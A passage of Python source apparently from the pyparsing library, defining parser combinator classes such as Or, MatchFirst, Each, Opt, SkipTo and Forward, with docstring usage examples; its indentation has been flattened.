errorStop = True
continue
if errorStop:
try:
loc, exprtokens = e._parse(instring, loc, doActions)
except ParseSyntaxException:
raise
except ParseBaseException as pe:
pe.__traceback__ = None
raise ParseSyntaxException._from_exception(pe)
except IndexError:
raise ParseSyntaxException(
instring, len(instring), self.errmsg, self
)
else:
loc, exprtokens = e._parse(instring, loc, doActions)
if exprtokens or exprtokens.haskeys():
resultlist += exprtokens
return loc, resultlist
def __iadd__(self, other):
if isinstance(other, str_type):
other = self._literalStringClass(other)
return self.append(other) # And([self, other])
def _checkRecursion(self, parseElementList):
subRecCheckList = parseElementList[:] + [self]
for e in self.exprs:
e._checkRecursion(subRecCheckList)
if not e.mayReturnEmpty:
break
def _generateDefaultName(self):
inner = " ".join(str(e) for e in self.exprs)
# strip off redundant inner {}'s
while len(inner) > 1 and inner[0 :: len(inner) - 1] == "{}":
inner = inner[1:-1]
return "{" + inner + "}"
class Or(ParseExpression):
"""Requires that at least one :class:`ParseExpression` is found. If
two expressions match, the expression that matches the longest
string will be used. May be constructed using the ``'^'``
operator.
Example::
# construct Or using '^' operator
number = Word(nums) ^ Combine(Word(nums) + '.' + Word(nums))
print(number.search_string("123 3.1416 789"))
prints::
[['123'], ['3.1416'], ['789']]
"""
def __init__(self, exprs: IterableType[ParserElement], savelist: bool = False):
super().__init__(exprs, savelist)
if self.exprs:
self.mayReturnEmpty = any(e.mayReturnEmpty for e in self.exprs)
self.skipWhitespace = all(e.skipWhitespace for e in self.exprs)
else:
self.mayReturnEmpty = True
def streamline(self) -> ParserElement:
super().streamline()
if self.exprs:
self.mayReturnEmpty = any(e.mayReturnEmpty for e in self.exprs)
self.saveAsList = any(e.saveAsList for e in self.exprs)
self.skipWhitespace = all(e.skipWhitespace for e in self.exprs)
else:
self.saveAsList = False
return self
def parseImpl(self, instring, loc, doActions=True):
maxExcLoc = -1
maxException = None
matches = []
fatals = []
if all(e.callPreparse for e in self.exprs):
loc = self.preParse(instring, loc)
for e in self.exprs:
try:
loc2 = e.try_parse(instring, loc, raise_fatal=True)
except ParseFatalException as pfe:
pfe.__traceback__ = None
pfe.parserElement = e
fatals.append(pfe)
maxException = None
maxExcLoc = -1
except ParseException as err:
if not fatals:
err.__traceback__ = None
if err.loc > maxExcLoc:
maxException = err
maxExcLoc = err.loc
except IndexError:
if len(instring) > maxExcLoc:
maxException = ParseException(
instring, len(instring), e.errmsg, self
)
maxExcLoc = len(instring)
else:
# save match among all matches, to retry longest to shortest
matches.append((loc2, e))
if matches:
# re-evaluate all matches in descending order of length of match, in case attached actions
# might change whether or how much they match of the input.
matches.sort(key=itemgetter(0), reverse=True)
if not doActions:
# no further conditions or parse actions to change the selection of
# alternative, so the first match will be the best match
best_expr = matches[0][1]
return best_expr._parse(instring, loc, doActions)
longest = -1, None
for loc1, expr1 in matches:
if loc1 <= longest[0]:
# already have a longer match than this one will deliver, we are done
return longest
try:
loc2, toks = expr1._parse(instring, loc, doActions)
except ParseException as err:
err.__traceback__ = None
if err.loc > maxExcLoc:
maxException = err
maxExcLoc = err.loc
else:
if loc2 >= loc1:
return loc2, toks
# didn't match as much as before
elif loc2 > longest[0]:
longest = loc2, toks
if longest != (-1, None):
return longest
if fatals:
if len(fatals) > 1:
fatals.sort(key=lambda e: -e.loc)
if fatals[0].loc == fatals[1].loc:
fatals.sort(key=lambda e: (-e.loc, -len(str(e.parserElement))))
max_fatal = fatals[0]
raise max_fatal
if maxException is not None:
maxException.msg = self.errmsg
raise maxException
else:
raise ParseException(
instring, loc, "no defined alternatives to match", self
)
def __ixor__(self, other):
if isinstance(other, str_type):
other = self._literalStringClass(other)
return self.append(other) # Or([self, other])
def _generateDefaultName(self):
return "{" + " ^ ".join(str(e) for e in self.exprs) + "}"
def _setResultsName(self, name, listAllMatches=False):
if (
__diag__.warn_multiple_tokens_in_named_alternation
and Diagnostics.warn_multiple_tokens_in_named_alternation
not in self.suppress_warnings_
):
if any(
isinstance(e, And)
and Diagnostics.warn_multiple_tokens_in_named_alternation
not in e.suppress_warnings_
for e in self.exprs
):
warnings.warn(
"{}: setting results name {!r} on {} expression "
"will return a list of all parsed tokens in an And alternative, "
"in prior versions only the first token was returned; enclose"
"contained argument in Group".format(
"warn_multiple_tokens_in_named_alternation",
name,
type(self).__name__,
),
stacklevel=3,
)
return super()._setResultsName(name, listAllMatches)
class MatchFirst(ParseExpression):
"""Requires that at least one :class:`ParseExpression` is found. If
more than one expression matches, the first one listed is the one that will
match. May be constructed using the ``'|'`` operator.
Example::
# construct MatchFirst using '|' operator
# watch the order of expressions to match
number = Word(nums) | Combine(Word(nums) + '.' + Word(nums))
print(number.search_string("123 3.1416 789")) # Fail! -> [['123'], ['3'], ['1416'], ['789']]
# put more selective expression first
number = Combine(Word(nums) + '.' + Word(nums)) | Word(nums)
print(number.search_string("123 3.1416 789")) # Better -> [['123'], ['3.1416'], ['789']]
"""
def __init__(self, exprs: IterableType[ParserElement], savelist: bool = False):
super().__init__(exprs, savelist)
if self.exprs:
self.mayReturnEmpty = any(e.mayReturnEmpty for e in self.exprs)
self.skipWhitespace = all(e.skipWhitespace for e in self.exprs)
else:
self.mayReturnEmpty = True
def streamline(self) -> ParserElement:
if self.streamlined:
return self
super().streamline()
if self.exprs:
self.saveAsList = any(e.saveAsList for e in self.exprs)
self.mayReturnEmpty = any(e.mayReturnEmpty for e in self.exprs)
self.skipWhitespace = all(e.skipWhitespace for e in self.exprs)
else:
self.saveAsList = False
self.mayReturnEmpty = True
return self
def parseImpl(self, instring, loc, doActions=True):
maxExcLoc = -1
maxException = None
for e in self.exprs:
try:
return e._parse(
instring,
loc,
doActions,
)
except ParseFatalException as pfe:
pfe.__traceback__ = None
pfe.parserElement = e
raise
except ParseException as err:
if err.loc > maxExcLoc:
maxException = err
maxExcLoc = err.loc
except IndexError:
if len(instring) > maxExcLoc:
maxException = ParseException(
instring, len(instring), e.errmsg, self
)
maxExcLoc = len(instring)
if maxException is not None:
maxException.msg = self.errmsg
raise maxException
else:
raise ParseException(
instring, loc, "no defined alternatives to match", self
)
def __ior__(self, other):
if isinstance(other, str_type):
other = self._literalStringClass(other)
return self.append(other) # MatchFirst([self, other])
def _generateDefaultName(self):
return "{" + " | ".join(str(e) for e in self.exprs) + "}"
def _setResultsName(self, name, listAllMatches=False):
if (
__diag__.warn_multiple_tokens_in_named_alternation
and Diagnostics.warn_multiple_tokens_in_named_alternation
not in self.suppress_warnings_
):
if any(
isinstance(e, And)
and Diagnostics.warn_multiple_tokens_in_named_alternation
not in e.suppress_warnings_
for e in self.exprs
):
warnings.warn(
"{}: setting results name {!r} on {} expression "
"will return a list of all parsed tokens in an And alternative, "
"in prior versions only the first token was returned; enclose"
"contained argument in Group".format(
"warn_multiple_tokens_in_named_alternation",
name,
type(self).__name__,
),
stacklevel=3,
)
return super()._setResultsName(name, listAllMatches)
class Each(ParseExpression):
"""Requires all given :class:`ParseExpression` s to be found, but in
any order. Expressions may be separated by whitespace.
May be constructed using the ``'&'`` operator.
Example::
color = one_of("RED ORANGE YELLOW GREEN BLUE PURPLE BLACK WHITE BROWN")
shape_type = one_of("SQUARE CIRCLE TRIANGLE STAR HEXAGON OCTAGON")
integer = Word(nums)
shape_attr = "shape:" + shape_type("shape")
posn_attr = "posn:" + Group(integer("x") + ',' + integer("y"))("posn")
color_attr = "color:" + color("color")
size_attr = "size:" + integer("size")
# use Each (using operator '&') to accept attributes in any order
# (shape and posn are required, color and size are optional)
shape_spec = shape_attr & posn_attr & Opt(color_attr) & Opt(size_attr)
shape_spec.run_tests('''
shape: SQUARE color: BLACK posn: 100, 120
shape: CIRCLE size: 50 color: BLUE posn: 50,80
color:GREEN size:20 shape:TRIANGLE posn:20,40
'''
)
prints::
shape: SQUARE color: BLACK posn: 100, 120
['shape:', 'SQUARE', 'color:', 'BLACK', 'posn:', ['100', ',', '120']]
- color: BLACK
- posn: ['100', ',', '120']
- x: 100
- y: 120
- shape: SQUARE
shape: CIRCLE size: 50 color: BLUE posn: 50,80
['shape:', 'CIRCLE', 'size:', '50', 'color:', 'BLUE', 'posn:', ['50', ',', '80']]
- color: BLUE
- posn: ['50', ',', '80']
- x: 50
- y: 80
- shape: CIRCLE
- size: 50
color: GREEN size: 20 shape: TRIANGLE posn: 20,40
['color:', 'GREEN', 'size:', '20', 'shape:', 'TRIANGLE', 'posn:', ['20', ',', '40']]
- color: GREEN
- posn: ['20', ',', '40']
- x: 20
- y: 40
- shape: TRIANGLE
- size: 20
"""
def __init__(self, exprs: IterableType[ParserElement], savelist: bool = True):
super().__init__(exprs, savelist)
if self.exprs:
self.mayReturnEmpty = all(e.mayReturnEmpty for e in self.exprs)
else:
self.mayReturnEmpty = True
self.skipWhitespace = True
self.initExprGroups = True
self.saveAsList = True
def streamline(self) -> ParserElement:
super().streamline()
if self.exprs:
self.mayReturnEmpty = all(e.mayReturnEmpty for e in self.exprs)
else:
self.mayReturnEmpty = True
return self
def parseImpl(self, instring, loc, doActions=True):
if self.initExprGroups:
self.opt1map = dict(
(id(e.expr), e) for e in self.exprs if isinstance(e, Opt)
)
opt1 = [e.expr for e in self.exprs if isinstance(e, Opt)]
opt2 = [
e
for e in self.exprs
if e.mayReturnEmpty and not isinstance(e, (Opt, Regex, ZeroOrMore))
]
self.optionals = opt1 + opt2
self.multioptionals = [
e.expr.set_results_name(e.resultsName, list_all_matches=True)
for e in self.exprs
if isinstance(e, _MultipleMatch)
]
self.multirequired = [
e.expr.set_results_name(e.resultsName, list_all_matches=True)
for e in self.exprs
if isinstance(e, OneOrMore)
]
self.required = [
e for e in self.exprs if not isinstance(e, (Opt, ZeroOrMore, OneOrMore))
]
self.required += self.multirequired
self.initExprGroups = False
tmpLoc = loc
tmpReqd = self.required[:]
tmpOpt = self.optionals[:]
multis = self.multioptionals[:]
matchOrder = []
keepMatching = True
failed = []
fatals = []
while keepMatching:
tmpExprs = tmpReqd + tmpOpt + multis
failed.clear()
fatals.clear()
for e in tmpExprs:
try:
tmpLoc = e.try_parse(instring, tmpLoc, raise_fatal=True)
except ParseFatalException as pfe:
pfe.__traceback__ = None
pfe.parserElement = e
fatals.append(pfe)
failed.append(e)
except ParseException:
failed.append(e)
else:
matchOrder.append(self.opt1map.get(id(e), e))
if e in tmpReqd:
tmpReqd.remove(e)
elif e in tmpOpt:
tmpOpt.remove(e)
if len(failed) == len(tmpExprs):
keepMatching = False
# look for any ParseFatalExceptions
if fatals:
if len(fatals) > 1:
fatals.sort(key=lambda e: -e.loc)
if fatals[0].loc == fatals[1].loc:
fatals.sort(key=lambda e: (-e.loc, -len(str(e.parserElement))))
max_fatal = fatals[0]
raise max_fatal
if tmpReqd:
missing = ", ".join(str(e) for e in tmpReqd)
raise ParseException(
instring,
loc,
"Missing one or more required elements ({})".format(missing),
)
# add any unmatched Opts, in case they have default values defined
matchOrder += [e for e in self.exprs if isinstance(e, Opt) and e.expr in tmpOpt]
total_results = ParseResults([])
for e in matchOrder:
loc, results = e._parse(instring, loc, doActions)
total_results += results
return loc, total_results
def _generateDefaultName(self):
return "{" + " & ".join(str(e) for e in self.exprs) + "}"
class ParseElementEnhance(ParserElement):
"""Abstract subclass of :class:`ParserElement`, for combining and
post-processing parsed tokens.
"""
def __init__(self, expr: Union[ParserElement, str], savelist: bool = False):
super().__init__(savelist)
if isinstance(expr, str_type):
if issubclass(self._literalStringClass, Token):
expr = self._literalStringClass(expr)
elif issubclass(type(self), self._literalStringClass):
expr = Literal(expr)
else:
expr = self._literalStringClass(Literal(expr))
self.expr = expr
if expr is not None:
self.mayIndexError = expr.mayIndexError
self.mayReturnEmpty = expr.mayReturnEmpty
self.set_whitespace_chars(
expr.whiteChars, copy_defaults=expr.copyDefaultWhiteChars
)
self.skipWhitespace = expr.skipWhitespace
self.saveAsList = expr.saveAsList
self.callPreparse = expr.callPreparse
self.ignoreExprs.extend(expr.ignoreExprs)
def recurse(self):
return [self.expr] if self.expr is not None else []
def parseImpl(self, instring, loc, doActions=True):
if self.expr is not None:
return self.expr._parse(instring, loc, doActions, callPreParse=False)
else:
raise ParseException("", loc, self.errmsg, self)
def leave_whitespace(self, recursive=True):
super().leave_whitespace(recursive)
if recursive:
self.expr = self.expr.copy()
if self.expr is not None:
self.expr.leave_whitespace(recursive)
return self
def ignore_whitespace(self, recursive=True):
super().ignore_whitespace(recursive)
if recursive:
self.expr = self.expr.copy()
if self.expr is not None:
self.expr.ignore_whitespace(recursive)
return self
def ignore(self, other):
if isinstance(other, Suppress):
if other not in self.ignoreExprs:
super().ignore(other)
if self.expr is not None:
self.expr.ignore(self.ignoreExprs[-1])
else:
super().ignore(other)
if self.expr is not None:
self.expr.ignore(self.ignoreExprs[-1])
return self
def streamline(self):
super().streamline()
if self.expr is not None:
self.expr.streamline()
return self
def _checkRecursion(self, parseElementList):
if self in parseElementList:
raise RecursiveGrammarException(parseElementList + [self])
subRecCheckList = parseElementList[:] + [self]
if self.expr is not None:
self.expr._checkRecursion(subRecCheckList)
def validate(self, validateTrace=None):
if validateTrace is None:
validateTrace = []
tmp = validateTrace[:] + [self]
if self.expr is not None:
self.expr.validate(tmp)
self._checkRecursion([])
def _generateDefaultName(self):
return "{}:({})".format(self.__class__.__name__, str(self.expr))
ignoreWhitespace = ignore_whitespace
leaveWhitespace = leave_whitespace
class IndentedBlock(ParseElementEnhance):
"""
Expression to match one or more expressions at a given indentation level.
Useful for parsing text where structure is implied by indentation (like Python source code).
"""
class _Indent(Empty):
def __init__(self, ref_col: int):
super().__init__()
self.errmsg = "expected indent at column {}".format(ref_col)
self.add_condition(lambda s, l, t: col(l, s) == ref_col)
class _IndentGreater(Empty):
def __init__(self, ref_col: int):
super().__init__()
self.errmsg = "expected indent at column greater than {}".format(ref_col)
self.add_condition(lambda s, l, t: col(l, s) > ref_col)
def __init__(
self, expr: ParserElement, *, recursive: bool = False, grouped: bool = True
):
super().__init__(expr, savelist=True)
# if recursive:
# raise NotImplementedError("IndentedBlock with recursive is not implemented")
self._recursive = recursive
self._grouped = grouped
self.parent_anchor = 1
def parseImpl(self, instring, loc, doActions=True):
# advance parse position to non-whitespace by using an Empty()
# this should be the column to be used for all subsequent indented lines
anchor_loc = Empty().preParse(instring, loc)
# see if self.expr matches at the current location - if not it will raise an exception
# and no further work is necessary
self.expr.try_parse(instring, anchor_loc, doActions)
indent_col = col(anchor_loc, instring)
peer_detect_expr = self._Indent(indent_col)
inner_expr = Empty() + peer_detect_expr + self.expr
if self._recursive:
sub_indent = self._IndentGreater(indent_col)
nested_block = IndentedBlock(
self.expr, recursive=self._recursive, grouped=self._grouped
)
nested_block.set_debug(self.debug)
nested_block.parent_anchor = indent_col
inner_expr += Opt(sub_indent + nested_block)
inner_expr.set_name(f"inner {hex(id(inner_expr))[-4:].upper()}@{indent_col}")
block = OneOrMore(inner_expr)
trailing_undent = self._Indent(self.parent_anchor) | StringEnd()
if self._grouped:
wrapper = Group
else:
wrapper = lambda expr: expr
return (wrapper(block) + Optional(trailing_undent)).parseImpl(
instring, anchor_loc, doActions
)
class AtStringStart(ParseElementEnhance):
"""Matches if expression matches at the beginning of the parse
string::
AtStringStart(Word(nums)).parse_string("123")
# prints ["123"]
AtStringStart(Word(nums)).parse_string(" 123")
# raises ParseException
"""
def __init__(self, expr: Union[ParserElement, str]):
super().__init__(expr)
self.callPreparse = False
def parseImpl(self, instring, loc, doActions=True):
if loc != 0:
raise ParseException(instring, loc, "not found at string start")
return super().parseImpl(instring, loc, doActions)
class AtLineStart(ParseElementEnhance):
r"""Matches if an expression matches at the beginning of a line within
the parse string
Example::
test = '''\
AAA this line
AAA and this line
AAA but not this one
B AAA and definitely not this one
'''
for t in (AtLineStart('AAA') + restOfLine).search_string(test):
print(t)
prints::
['AAA', ' this line']
['AAA', ' and this line']
"""
def __init__(self, expr: Union[ParserElement, str]):
super().__init__(expr)
self.callPreparse = False
def parseImpl(self, instring, loc, doActions=True):
if col(loc, instring) != 1:
raise ParseException(instring, loc, "not found at line start")
return super().parseImpl(instring, loc, doActions)
class FollowedBy(ParseElementEnhance):
"""Lookahead matching of the given parse expression.
``FollowedBy`` does *not* advance the parsing position within
the input string, it only verifies that the specified parse
expression matches at the current position. ``FollowedBy``
always returns a null token list. If any results names are defined
in the lookahead expression, those *will* be returned for access by
name.
Example::
# use FollowedBy to match a label only if it is followed by a ':'
data_word = Word(alphas)
label = data_word + FollowedBy(':')
attr_expr = Group(label + Suppress(':') + OneOrMore(data_word, stop_on=label).set_parse_action(' '.join))
OneOrMore(attr_expr).parse_string("shape: SQUARE color: BLACK posn: upper left").pprint()
prints::
[['shape', 'SQUARE'], ['color', 'BLACK'], ['posn', 'upper left']]
"""
def __init__(self, expr: Union[ParserElement, str]):
super().__init__(expr)
self.mayReturnEmpty = True
def parseImpl(self, instring, loc, doActions=True):
# by using self._expr.parse and deleting the contents of the returned ParseResults list
# we keep any named results that were defined in the FollowedBy expression
_, ret = self.expr._parse(instring, loc, doActions=doActions)
del ret[:]
return loc, ret
class PrecededBy(ParseElementEnhance):
"""Lookbehind matching of the given parse expression.
``PrecededBy`` does not advance the parsing position within the
input string, it only verifies that the specified parse expression
matches prior to the current position. ``PrecededBy`` always
returns a null token list, but if a results name is defined on the
given expression, it is returned.
Parameters:
- expr - expression that must match prior to the current parse
location
- retreat - (default= ``None``) - (int) maximum number of characters
to lookbehind prior to the current parse location
If the lookbehind expression is a string, :class:`Literal`,
:class:`Keyword`, or a :class:`Word` or :class:`CharsNotIn`
with a specified exact or maximum length, then the retreat
parameter is not required. Otherwise, retreat must be specified to
give a maximum number of characters to look back from
the current parse position for a lookbehind match.
Example::
# VB-style variable names with type prefixes
int_var = PrecededBy("#") + pyparsing_common.identifier
str_var = PrecededBy("$") + pyparsing_common.identifier
"""
def __init__(
self, expr: Union[ParserElement, str], retreat: OptionalType[int] = None
):
super().__init__(expr)
self.expr = self.expr().leave_whitespace()
self.mayReturnEmpty = True
self.mayIndexError = False
self.exact = False
if isinstance(expr, str_type):
retreat = len(expr)
self.exact = True
elif isinstance(expr, (Literal, Keyword)):
retreat = expr.matchLen
self.exact = True
elif isinstance(expr, (Word, CharsNotIn)) and expr.maxLen != _MAX_INT:
retreat = expr.maxLen
self.exact = True
elif isinstance(expr, PositionToken):
retreat = 0
self.exact = True
self.retreat = retreat
self.errmsg = "not preceded by " + str(expr)
self.skipWhitespace = False
self.parseAction.append(lambda s, l, t: t.__delitem__(slice(None, None)))
def parseImpl(self, instring, loc=0, doActions=True):
if self.exact:
if loc < self.retreat:
raise ParseException(instring, loc, self.errmsg)
start = loc - self.retreat
_, ret = self.expr._parse(instring, start)
else:
# retreat specified a maximum lookbehind window, iterate
test_expr = self.expr + StringEnd()
instring_slice = instring[max(0, loc - self.retreat) : loc]
last_expr = ParseException(instring, loc, self.errmsg)
for offset in range(1, min(loc, self.retreat + 1) + 1):
try:
# print('trying', offset, instring_slice, repr(instring_slice[loc - offset:]))
_, ret = test_expr._parse(
instring_slice, len(instring_slice) - offset
)
except ParseBaseException as pbe:
last_expr = pbe
else:
break
else:
raise last_expr
return loc, ret
class Located(ParseElementEnhance):
"""
Decorates a returned token with its starting and ending
locations in the input string.
This helper adds the following results names:
- ``locn_start`` - location where matched expression begins
- ``locn_end`` - location where matched expression ends
- ``value`` - the actual parsed results
Be careful if the input text contains ``<TAB>`` characters, you
may want to call :class:`ParserElement.parse_with_tabs`
Example::
wd = Word(alphas)
for match in Located(wd).search_string("ljsdf123lksdjjf123lkkjj1222"):
print(match)
prints::
[0, ['ljsdf'], 5]
[8, ['lksdjjf'], 15]
[18, ['lkkjj'], 23]
"""
def parseImpl(self, instring, loc, doActions=True):
start = loc
loc, tokens = self.expr._parse(instring, start, doActions, callPreParse=False)
ret_tokens = ParseResults([start, tokens, loc])
ret_tokens["locn_start"] = start
ret_tokens["value"] = tokens
ret_tokens["locn_end"] = loc
if self.resultsName:
# must return as a list, so that the name will be attached to the complete group
return loc, [ret_tokens]
else:
return loc, ret_tokens
class NotAny(ParseElementEnhance):
"""
Lookahead to disallow matching with the given parse expression.
``NotAny`` does *not* advance the parsing position within the
input string, it only verifies that the specified parse expression
does *not* match at the current position. Also, ``NotAny`` does
*not* skip over leading whitespace. ``NotAny`` always returns
a null token list. May be constructed using the ``'~'`` operator.
Example::
AND, OR, NOT = map(CaselessKeyword, "AND OR NOT".split())
# take care not to mistake keywords for identifiers
ident = ~(AND | OR | NOT) + Word(alphas)
boolean_term = Opt(NOT) + ident
# very crude boolean expression - to support parenthesis groups and
# operation hierarchy, use infix_notation
boolean_expr = boolean_term + ZeroOrMore((AND | OR) + boolean_term)
# integers that are followed by "." are actually floats
integer = Word(nums) + ~Char(".")
"""
def __init__(self, expr: Union[ParserElement, str]):
super().__init__(expr)
# do NOT use self.leave_whitespace(), don't want to propagate to exprs
# self.leave_whitespace()
self.skipWhitespace = False
self.mayReturnEmpty = True
self.errmsg = "Found unwanted token, " + str(self.expr)
def parseImpl(self, instring, loc, doActions=True):
if self.expr.can_parse_next(instring, loc):
raise ParseException(instring, loc, self.errmsg, self)
return loc, []
def _generateDefaultName(self):
return "~{" + str(self.expr) + "}"
class _MultipleMatch(ParseElementEnhance):
def __init__(
self,
expr: ParserElement,
stop_on: OptionalType[Union[ParserElement, str]] = None,
*,
stopOn: OptionalType[Union[ParserElement, str]] = None,
):
super().__init__(expr)
stopOn = stopOn or stop_on
self.saveAsList = True
ender = stopOn
if isinstance(ender, str_type):
ender = self._literalStringClass(ender)
self.stopOn(ender)
def stopOn(self, ender):
if isinstance(ender, str_type):
ender = self._literalStringClass(ender)
self.not_ender = ~ender if ender is not None else None
return self
def parseImpl(self, instring, loc, doActions=True):
self_expr_parse = self.expr._parse
self_skip_ignorables = self._skipIgnorables
check_ender = self.not_ender is not None
if check_ender:
try_not_ender = self.not_ender.tryParse
# must be at least one (but first see if we are the stopOn sentinel;
# if so, fail)
if check_ender:
try_not_ender(instring, loc)
loc, tokens = self_expr_parse(instring, loc, doActions)
try:
hasIgnoreExprs = not not self.ignoreExprs
while 1:
if check_ender:
try_not_ender(instring, loc)
if hasIgnoreExprs:
preloc = self_skip_ignorables(instring, loc)
else:
preloc = loc
loc, tmptokens = self_expr_parse(instring, preloc, doActions)
if tmptokens or tmptokens.haskeys():
tokens += tmptokens
except (ParseException, IndexError):
pass
return loc, tokens
def _setResultsName(self, name, listAllMatches=False):
if (
__diag__.warn_ungrouped_named_tokens_in_collection
and Diagnostics.warn_ungrouped_named_tokens_in_collection
not in self.suppress_warnings_
):
for e in [self.expr] + self.expr.recurse():
if (
isinstance(e, ParserElement)
and e.resultsName
and Diagnostics.warn_ungrouped_named_tokens_in_collection
not in e.suppress_warnings_
):
warnings.warn(
"{}: setting results name {!r} on {} expression "
"collides with {!r} on contained expression".format(
"warn_ungrouped_named_tokens_in_collection",
name,
type(self).__name__,
e.resultsName,
),
stacklevel=3,
)
return super()._setResultsName(name, listAllMatches)
class OneOrMore(_MultipleMatch):
"""
Repetition of one or more of the given expression.
Parameters:
- expr - expression that must match one or more times
- stop_on - (default= ``None``) - expression for a terminating sentinel
(only required if the sentinel would ordinarily match the repetition
expression)
Example::
data_word = Word(alphas)
label = data_word + FollowedBy(':')
attr_expr = Group(label + Suppress(':') + OneOrMore(data_word).set_parse_action(' '.join))
text = "shape: SQUARE posn: upper left color: BLACK"
OneOrMore(attr_expr).parse_string(text).pprint() # Fail! read 'color' as data instead of next label -> [['shape', 'SQUARE color']]
# use stop_on attribute for OneOrMore to avoid reading label string as part of the data
attr_expr = Group(label + Suppress(':') + OneOrMore(data_word, stop_on=label).set_parse_action(' '.join))
OneOrMore(attr_expr).parse_string(text).pprint() # Better -> [['shape', 'SQUARE'], ['posn', 'upper left'], ['color', 'BLACK']]
# could also be written as
(attr_expr * (1,)).parse_string(text).pprint()
"""
def _generateDefaultName(self):
return "{" + str(self.expr) + "}..."
class ZeroOrMore(_MultipleMatch):
"""
Optional repetition of zero or more of the given expression.
Parameters:
- ``expr`` - expression that must match zero or more times
- ``stop_on`` - expression for a terminating sentinel
(only required if the sentinel would ordinarily match the repetition
expression) - (default= ``None``)
Example: similar to :class:`OneOrMore`
"""
def __init__(
self,
expr: ParserElement,
stop_on: OptionalType[Union[ParserElement, str]] = None,
*,
stopOn: OptionalType[Union[ParserElement, str]] = None,
):
super().__init__(expr, stopOn=stopOn or stop_on)
self.mayReturnEmpty = True
def parseImpl(self, instring, loc, doActions=True):
try:
return super().parseImpl(instring, loc, doActions)
except (ParseException, IndexError):
return loc, ParseResults([], name=self.resultsName)
def _generateDefaultName(self):
return "[" + str(self.expr) + "]..."
class _NullToken:
def __bool__(self):
return False
def __str__(self):
return ""
class Opt(ParseElementEnhance):
"""
Optional matching of the given expression.
Parameters:
- ``expr`` - expression that must match zero or more times
- ``default`` (optional) - value to be returned if the optional expression is not found.
Example::
# US postal code can be a 5-digit zip, plus optional 4-digit qualifier
zip = Combine(Word(nums, exact=5) + Opt('-' + Word(nums, exact=4)))
zip.run_tests('''
# traditional ZIP code
12345
# ZIP+4 form
12101-0001
# invalid ZIP
98765-
''')
prints::
# traditional ZIP code
12345
['12345']
# ZIP+4 form
12101-0001
['12101-0001']
# invalid ZIP
98765-
^
FAIL: Expected end of text (at char 5), (line:1, col:6)
"""
__optionalNotMatched = _NullToken()
def __init__(
self, expr: Union[ParserElement, str], default: Any = __optionalNotMatched
):
super().__init__(expr, savelist=False)
self.saveAsList = self.expr.saveAsList
self.defaultValue = default
self.mayReturnEmpty = True
def parseImpl(self, instring, loc, doActions=True):
self_expr = self.expr
try:
loc, tokens = self_expr._parse(instring, loc, doActions, callPreParse=False)
except (ParseException, IndexError):
default_value = self.defaultValue
if default_value is not self.__optionalNotMatched:
if self_expr.resultsName:
tokens = ParseResults([default_value])
tokens[self_expr.resultsName] = default_value
else:
tokens = [default_value]
else:
tokens = []
return loc, tokens
def _generateDefaultName(self):
inner = str(self.expr)
# strip off redundant inner {}'s
while len(inner) > 1 and inner[0 :: len(inner) - 1] == "{}":
inner = inner[1:-1]
return "[" + inner + "]"
Optional = Opt
class SkipTo(ParseElementEnhance):
"""
Token for skipping over all undefined text until the matched
expression is found.
Parameters:
- ``expr`` - target expression marking the end of the data to be skipped
- ``include`` - if ``True``, the target expression is also parsed
(the skipped text and target expression are returned as a 2-element
list) (default= ``False``).
- ``ignore`` - (default= ``None``) used to define grammars (typically quoted strings and
comments) that might contain false matches to the target expression
- ``fail_on`` - (default= ``None``) define expressions that are not allowed to be
included in the skipped test; if found before the target expression is found,
the :class:`SkipTo` is not a match
Example::
report = '''
Outstanding Issues Report - 1 Jan 2000
# | Severity | Description | Days Open
-----+----------+-------------------------------------------+-----------
101 | Critical | Intermittent system crash | 6
94 | Cosmetic | Spelling error on Login ('log|n') | 14
79 | Minor | System slow when running too many reports | 47
'''
integer = Word(nums)
SEP = Suppress('|')
# use SkipTo to simply match everything up until the next SEP
# - ignore quoted strings, so that a '|' character inside a quoted string does not match
# - parse action will call token.strip() for each matched token, i.e., the description body
string_data = SkipTo(SEP, ignore=quoted_string)
string_data.set_parse_action(token_map(str.strip))
ticket_expr = (integer("issue_num") + SEP
+ string_data("sev") + SEP
+ string_data("desc") + SEP
+ integer("days_open"))
for tkt in ticket_expr.search_string(report):
print tkt.dump()
prints::
['101', 'Critical', 'Intermittent system crash', '6']
- days_open: 6
- desc: Intermittent system crash
- issue_num: 101
- sev: Critical
['94', 'Cosmetic', "Spelling error on Login ('log|n')", '14']
- days_open: 14
- desc: Spelling error on Login ('log|n')
- issue_num: 94
- sev: Cosmetic
['79', 'Minor', 'System slow when running too many reports', '47']
- days_open: 47
- desc: System slow when running too many reports
- issue_num: 79
- sev: Minor
"""
def __init__(
self,
other: Union[ParserElement, str],
include: bool = False,
ignore: bool = None,
fail_on: OptionalType[Union[ParserElement, str]] = None,
*,
failOn: Union[ParserElement, str] = None,
):
super().__init__(other)
failOn = failOn or fail_on
self.ignoreExpr = ignore
self.mayReturnEmpty = True
self.mayIndexError = False
self.includeMatch = include
self.saveAsList = False
if isinstance(failOn, str_type):
self.failOn = self._literalStringClass(failOn)
else:
self.failOn = failOn
self.errmsg = "No match found for " + str(self.expr)
def parseImpl(self, instring, loc, doActions=True):
startloc = loc
instrlen = len(instring)
self_expr_parse = self.expr._parse
self_failOn_canParseNext = (
self.failOn.canParseNext if self.failOn is not None else None
)
self_ignoreExpr_tryParse = (
self.ignoreExpr.tryParse if self.ignoreExpr is not None else None
)
tmploc = loc
while tmploc <= instrlen:
if self_failOn_canParseNext is not None:
# break if failOn expression matches
if self_failOn_canParseNext(instring, tmploc):
break
if self_ignoreExpr_tryParse is not None:
# advance past ignore expressions
while 1:
try:
tmploc = self_ignoreExpr_tryParse(instring, tmploc)
except ParseBaseException:
break
try:
self_expr_parse(instring, tmploc, doActions=False, callPreParse=False)
except (ParseException, IndexError):
# no match, advance loc in string
tmploc += 1
else:
# matched skipto expr, done
break
else:
# ran off the end of the input string without matching skipto expr, fail
raise ParseException(instring, loc, self.errmsg, self)
# build up return values
loc = tmploc
skiptext = instring[startloc:loc]
skipresult = ParseResults(skiptext)
if self.includeMatch:
loc, mat = self_expr_parse(instring, loc, doActions, callPreParse=False)
skipresult += mat
return loc, skipresult
class Forward(ParseElementEnhance):
"""
Forward declaration of an expression to be defined later -
used for recursive grammars, such as algebraic infix notation.
When the expression is known, it is assigned to the ``Forward``
variable using the ``'<<'`` operator.
Note: take care when assigning to ``Forward`` not to overlook
precedence of operators.
Specifically, ``'|'`` has a lower precedence than ``'<<'``, so that::
fwd_expr << a | b | c
will actually be evaluated as::
(fwd_expr << a) | b | c
thereby leaving b and c out as parseable alternatives. It is recommended that you
explicitly group the values inserted into the ``Forward``::
